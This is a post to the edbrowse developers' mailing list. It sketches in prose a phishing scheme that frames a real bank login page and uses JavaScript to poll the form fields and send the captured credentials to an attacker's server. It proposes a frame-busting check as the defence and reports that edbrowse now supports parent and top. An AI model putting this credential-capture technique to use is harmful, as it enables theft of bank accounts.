So if I had an email server in China that spewed out millions of phishing 
emails each day, I could have those emails direct the user to a false site that 
was a blank window with a frame inside and that frame brings up Bank of
This isn't a fake Bank of America site with copies of their logos and a perfect 
reproduction, no, it's their real site with the up to date images and even
the personal picture that you selected, that goes with your cookie and your 
account, that comes up for security so you know it's the real site.
But it's under my frame.
You start to log in, you put in your user name and password, and before you can 
press submit,
my javascript is dipping into the Bank of America objects every quarter second, 
specifically the values of the input fields of the form.
Before you can log in my javascript captures your user name and password, and 
it sends them to me.
By putting them as search on an http request to my website, which js can do.


Isn't that all entirely doable, on any browser, including (perhaps) edbrowse?
I can only think of one defense against this.
In a hierarchy of frames, parent points to the frame above you, the frame that 
contains you, and top points to the top window that started it all, or at least 
that's how I think it's suppose to work.
So bank of America, and every site that deals with critical information, should 

if(top != window) {
Replace the entire page with a warning that this page cannot be a frame in a 
larger page, and you are visiting a false site that is trying to jack your 
account information, and you should be more careful what you click on in your 

That's all I can think of.
Anyways this is a long story to note that edbrowse now has parent and top as 
described above.
It was only 12 lines of code, so I like that.

On another note, I'm not entirely sure I set the right frame on various 
If you click a button or hyperlink or anything that runs js, do I take the time 
to set the context according to the frame you're in?
I'm not sure...
Maybe these are things I should have checked before 3.7.0, but I imagine 3.7.1 
will come soon enough,
with these kinds of bug fixes, and the new autoexpansion of frames, which 
should make more sites accessible.
Is there still a couple months before the distros put their packages together?
I imagine they are all independent of each other, so maybe that's a silly 
We just plug away as we can.

Karl Dahlke
Edbrowse-dev mailing list

Reply via email to